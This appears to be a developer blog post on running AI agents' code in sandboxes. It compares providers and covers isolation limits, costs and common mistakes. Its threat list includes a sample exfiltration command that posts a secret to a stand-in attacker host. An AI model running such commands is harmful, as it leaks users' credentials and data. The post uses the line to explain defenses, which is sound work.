Code-executing AI agents are now standard. ChatGPT runs Python; Claude Code executes commands; analytical agents spin up Python kernels. Where they execute matters as much as what they execute. This post is the working guide to sandboxed code execution for agents in 2026.
Why sandboxes
Agents run code based on user input, retrieved documents, or LLM-generated reasoning. All three are untrusted. Without isolation:
- Filesystem leakage: /etc/passwd, AWS credentials, other users’ data.
- Network exfiltration: curl evil.com -d $secret.
- Resource exhaustion: while true; do :; done.
- Privilege escalation: kernel exploits, container breakouts.
A sandbox is the answer. The question is which one.
The 2026 stack
| Sandbox | Type | Spin-up | Strengths |
|---|---|---|---|
| E2B | Managed Firecracker | <500ms | Built for AI agents, code-interpreter shape, GitHub auth |
| Modal | Managed serverless | 1–2s | General compute, GPU support, big batches |
| Daytona | Managed dev envs | 2–5s | IDE-shaped, good for dev tools |
| Fly Machines | Managed Firecracker | 200ms | Generic, very cheap |
| AWS Lambda | Managed | <100ms | Mature, restrictive (no GPU, 15min limit) |
| Cloudflare Workers / Sandbox | Managed isolates | 10ms | V8 only, very fast, limited |
| Daytona / Codespaces | Containers | 3–10s | Persistent dev experience |
| Self-host Firecracker | Self-host | 200ms | Full control |
| gVisor | Self-host | 100ms | Container-style sandbox |
E2B — the AI-native choice
E2B is purpose-built for agents. Spin up a Linux VM in <500ms, run code, kill it.
from e2b_code_interpreter import Sandbox

with Sandbox() as sb:
    result = sb.run_code("import pandas as pd; df = pd.read_csv('data.csv'); df.describe()")
    print(result.text)

    # Upload a file
    sb.files.write("/tmp/script.py", "print('hi')")

    # Run a shell command
    out = sb.commands.run("ls -la /tmp")
What’s good:
- Fast spin-up. Firecracker microVM under the hood.
- Persistent state within a sandbox session.
- File and command APIs — most agent needs.
- Pre-installed Python, Node, etc. Agent doesn’t have to install pandas every time.
- Internet access (allowlist configurable).
For a code interpreter for an LLM, E2B is the path of least resistance.
Modal — when you need more
For larger workloads (longer runs, GPU, big batch jobs), Modal is the next step.
import modal

app = modal.App("agent-runner")

@app.function(image=modal.Image.debian_slim().pip_install("pandas", "scikit-learn"))
def analyze(csv_text: str) -> str:
    # Imports live inside the function so they resolve in the remote image.
    import pandas as pd
    from io import StringIO

    df = pd.read_csv(StringIO(csv_text))
    return df.describe().to_json()

# Call from agent (needs a running or deployed app, e.g. inside `with app.run():`):
result = analyze.remote(csv_data)
Modal scales bigger and supports GPUs. It’s not “spin-up-microVM-fast” — typical first call is 1–2s — but for longer jobs the difference is irrelevant.
Tool integration with an LLM
@tool
async def run_python(code: str) -> str:
    """Run Python code in a sandbox. Returns stdout + stderr."""
    async with E2BSandbox() as sb:
        try:
            result = await sb.run_code(code, timeout=30)
            return result.text or result.error or "(no output)"
        except Exception as e:
            return f"sandbox error: {e}"
Wire it to an agent:
agent = create_agent(tools=[run_python])
result = await agent.ainvoke({"messages": [HumanMessage("calculate the variance of [1,2,3,4,5]")]})
The agent calls run_python with code; the sandbox executes; results flow back. Same shape as any tool call.
What to lock down
For each sandbox session, decide:
- Network: full / allowlist / none. Default to allowlist (the few APIs the agent should reach).
- Filesystem: scratch only / mount specific dirs / read-only.
- Time limit: 30 seconds is generous for most code; cap aggressively.
- Memory limit: 1 GB for code interpreters; less for narrow tasks.
- CPU limit: 1 core usually plenty.
- Egress data: cap bytes; alert on outliers.
E2B and Modal both expose these. Self-host and you set them yourself.
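One way to keep these decisions explicit is a small policy object that the tool layer consults before it creates a sandbox or lets a request out. This is a sketch only: `SandboxPolicy`, its field names, `egress_allowed`, and the egress byte cap are hypothetical and not part of the E2B or Modal APIs. The other defaults mirror the numbers in the list above.

```python
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class SandboxPolicy:
    """Hypothetical per-session limits; defaults mirror the list above."""
    allowed_hosts: frozenset = frozenset()     # empty set = no network at all
    timeout_s: int = 30
    memory_mb: int = 1024
    cpu_cores: int = 1
    max_egress_bytes: int = 10 * 1024 * 1024   # assumed cap, tune per product


def egress_allowed(url: str, policy: SandboxPolicy) -> bool:
    """Return True only if the URL's host is exactly on the allowlist."""
    host = (urlparse(url).hostname or "").lower()
    return host in policy.allowed_hosts


policy = SandboxPolicy(allowed_hosts=frozenset({"api.example.com"}))
print(egress_allowed("https://api.example.com/v1/data", policy))
print(egress_allowed("https://evil.com/upload", policy))
```

Exact host matching is deliberate: a suffix or substring check would let a host like api.example.com.evil.com through.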
When self-hosted wins
- Strict compliance (data must not leave VPC).
- High volume (>100 sandboxes/min sustained — managed cost rises).
- Specific networking needs (custom egress filtering).
- Custom base images that aren’t a fit for managed.
For most teams under that threshold, managed (E2B / Modal) wins.
Common patterns
1. Per-conversation sandbox
The agent maintains one sandbox per user session. State persists across tool calls within the session. Killed at session end.
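A minimal sketch of that lifecycle, assuming a registry keyed by session ID. `FakeSandbox` and `SessionSandboxes` are hypothetical stand-ins so the example runs locally; in a real product the factory would create an actual sandbox.

```python
import uuid


class FakeSandbox:
    """Stand-in for a real sandbox client so the sketch runs locally."""

    def __init__(self) -> None:
        self.id = uuid.uuid4().hex
        self.closed = False

    def kill(self) -> None:
        self.closed = True


class SessionSandboxes:
    """Maps each session ID to exactly one sandbox."""

    def __init__(self, factory=FakeSandbox) -> None:
        self._factory = factory
        self._by_session = {}

    def get(self, session_id: str):
        # Create lazily on the first tool call, reuse on later calls.
        if session_id not in self._by_session:
            self._by_session[session_id] = self._factory()
        return self._by_session[session_id]

    def end(self, session_id: str) -> None:
        # Kill and forget the sandbox when the session ends.
        sandbox = self._by_session.pop(session_id, None)
        if sandbox is not None:
            sandbox.kill()


sessions = SessionSandboxes()
first = sessions.get("alice")
print(sessions.get("alice") is first)   # same sandbox within a session
print(sessions.get("bob") is first)     # never shared across sessions
sessions.end("alice")
print(first.closed)
```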
2. Per-call sandbox
Stateless: each run_python call spins up a fresh sandbox. Simple, slower, sometimes wasteful (re-imports pandas every call).
3. Pool of warm sandboxes
For low-latency apps, keep N sandboxes warm. New requests grab from the pool. Slightly more ops; sub-100ms response.
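The pool idea can be sketched with a plain queue. `FakeSandbox` and `WarmPool` are hypothetical names for illustration. The refill here is synchronous to keep the example short; a production pool would more likely refill in the background.

```python
import itertools
import queue


class FakeSandbox:
    """Stand-in for a real sandbox client so the sketch runs locally."""
    _ids = itertools.count(1)

    def __init__(self) -> None:
        self.id = next(FakeSandbox._ids)


class WarmPool:
    """Keeps `size` pre-started sandboxes ready to hand out."""

    def __init__(self, size: int, factory=FakeSandbox) -> None:
        self._factory = factory
        self._ready = queue.Queue()
        for _ in range(size):
            self._ready.put(factory())

    def acquire(self):
        try:
            sandbox = self._ready.get_nowait()   # warm path: no boot wait
        except queue.Empty:
            return self._factory()               # pool drained: cold start
        # Top the pool back up so the next request is also warm.
        self._ready.put(self._factory())
        return sandbox

    def ready_count(self) -> int:
        return self._ready.qsize()


pool = WarmPool(size=2)
a, b = pool.acquire(), pool.acquire()
print(a is not b, pool.ready_count())
```

Used sandboxes are never returned to the pool in this sketch, so a warm sandbox cannot carry one user's state to the next.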
4. Sandboxed agents (recursive)
The whole agent runs in a sandbox. Useful when the agent itself is untrusted (running user-uploaded prompts).
Cost reality
E2B: ~$0.0002/second of sandbox time. A typical query (5 seconds) costs $0.001. At 100k queries/day: $100/day, $3k/month.
Self-hosted Firecracker on cheap VMs: ~$0.00001/sec. Same query = $0.00005. At scale, self-host is dramatically cheaper. Below scale, the ops cost eats the savings.
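The arithmetic is easy to rerun with your own traffic numbers. The per-second prices below are the approximate figures quoted above; the 30-day month and the constant names are assumptions for illustration.

```python
SECONDS_PER_QUERY = 5
QUERIES_PER_DAY = 100_000
DAYS_PER_MONTH = 30   # assumed month length


def monthly_cost(price_per_second: float) -> float:
    """Sandbox spend per month at the traffic assumed above."""
    return price_per_second * SECONDS_PER_QUERY * QUERIES_PER_DAY * DAYS_PER_MONTH


managed = monthly_cost(0.0002)      # E2B figure quoted above
self_host = monthly_cost(0.00001)   # self-hosted Firecracker figure quoted above

print(f"managed:   ${managed:,.0f}/month")
print(f"self-host: ${self_host:,.0f}/month")
print(f"gap:       ${managed - self_host:,.0f}/month to cover ops")
```

At these numbers the gap is roughly $2,850 a month. That is the budget the self-hosted option has for engineering and on-call time before it stops being cheaper.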
Common mistakes
1. No timeout
Agent’s bug → infinite loop → sandbox bills accumulate. Always cap.
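Beyond the sandbox's own timeout setting, a client-side deadline guards against a call that never returns. A minimal sketch using `asyncio.wait_for`; `run_with_deadline` and `fake_sandbox_run` are hypothetical names, and the fake call only sleeps to simulate slow code.

```python
import asyncio


async def run_with_deadline(coro, seconds: float) -> str:
    """Await a sandbox call, but give up after `seconds`."""
    try:
        return await asyncio.wait_for(coro, timeout=seconds)
    except asyncio.TimeoutError:
        return f"timeout after {seconds}s"


async def fake_sandbox_run(code: str, takes: float) -> str:
    # Hypothetical stand-in for a real sandbox call.
    await asyncio.sleep(takes)
    return f"ran: {code}"


async def main() -> None:
    print(await run_with_deadline(fake_sandbox_run("1 + 1", 0.01), 1.0))
    print(await run_with_deadline(fake_sandbox_run("while True: pass", 5.0), 0.1))


asyncio.run(main())
```

A client-side deadline only stops the waiting. The sandbox itself still needs its own time limit, or an explicit kill, so that billing stops too.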
2. Network wide-open
The agent emits a curl command and exfiltrates data. Always allowlist.
3. State across users
Reusing a sandbox between users → previous user’s secrets in env vars/filesystem. Always fresh per user.
4. Logging code without redaction
The user might paste an API key into a code block. Logged code = leaked key. Filter or hash before logging.
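A rough sketch of the filter-or-hash step, assuming a handful of regex patterns for common key shapes. The patterns and the `redact` helper are illustrative, not a complete secret scanner; extend them for the providers you actually use.

```python
import hashlib
import re

# Assumed patterns for illustration only.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),                    # AWS access key ID shape
    re.compile(r"sk-[A-Za-z0-9_-]{20,}"),               # common "sk-" API key shape
    re.compile(r"(?i)bearer\s+[a-z0-9._~+/=-]{20,}"),   # bearer tokens
]


def redact(code: str) -> str:
    """Replace anything that looks like a secret with a short hash tag."""
    def _tag(match: re.Match) -> str:
        digest = hashlib.sha256(match.group(0).encode()).hexdigest()[:8]
        return f"[REDACTED:{digest}]"

    for pattern in SECRET_PATTERNS:
        code = pattern.sub(_tag, code)
    return code


snippet = 'client = Client(api_key="sk-abcdefghijklmnopqrstuvwxyz123456")'
print(redact(snippet))
```

Hashing rather than deleting keeps logs correlatable: the same leaked key produces the same tag each time, without the key itself ever being stored.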
5. No resource caps
A misbehaving agent can OOM the sandbox host. Caps protect everyone.
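On a managed or microVM setup the caps are set on the sandbox itself. As a local illustration of the same idea, the sketch below caps memory and CPU time for a child Python process using the standard `resource` module. It is Linux-oriented and POSIX-only, it is not a sandbox on its own, and the constants and helper names are assumptions for this example.

```python
import resource
import subprocess
import sys

MEMORY_BYTES = 1024 ** 3   # 1 GB, the default suggested in this post
CPU_SECONDS = 30


def _clamp(limit_kind: int, wanted: int) -> None:
    """Lower a limit to `wanted`, never above the existing hard limit."""
    _, hard = resource.getrlimit(limit_kind)
    if hard != resource.RLIM_INFINITY:
        wanted = min(wanted, hard)
    resource.setrlimit(limit_kind, (wanted, wanted))


def _apply_caps() -> None:
    # Runs in the child process just before the interpreter starts.
    _clamp(resource.RLIMIT_AS, MEMORY_BYTES)
    _clamp(resource.RLIMIT_CPU, CPU_SECONDS)


def run_capped(code: str) -> subprocess.CompletedProcess:
    """Run code in a child Python process with memory and CPU caps."""
    return subprocess.run(
        [sys.executable, "-c", code],
        preexec_fn=_apply_caps,
        capture_output=True,
        text=True,
        timeout=CPU_SECONDS + 5,   # wall-clock backstop
    )


print(run_capped("print('ok')").stdout.strip())
```

With these caps in place, code that tries to allocate well past the limit should fail inside the child process instead of pressuring the host.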
What I’d build today
For a new agent product that runs code:
- E2B for the sandbox (managed, fast, agent-shaped).
- A run_python and run_shell tool wired to the agent.
- Sandbox per user session, killed on disconnect.
- 30-second timeout, 1 GB memory cap by default.
- Network allowlist for the APIs the agent should reach.
- Logging + alerting on long runs and failed sandboxes.
Pair with the LLM Security in 2026 defenses — sandbox is one layer in a defense-in-depth strategy.
If you want a working agent + E2B + tool-call template, it’s at rajpoot.dev.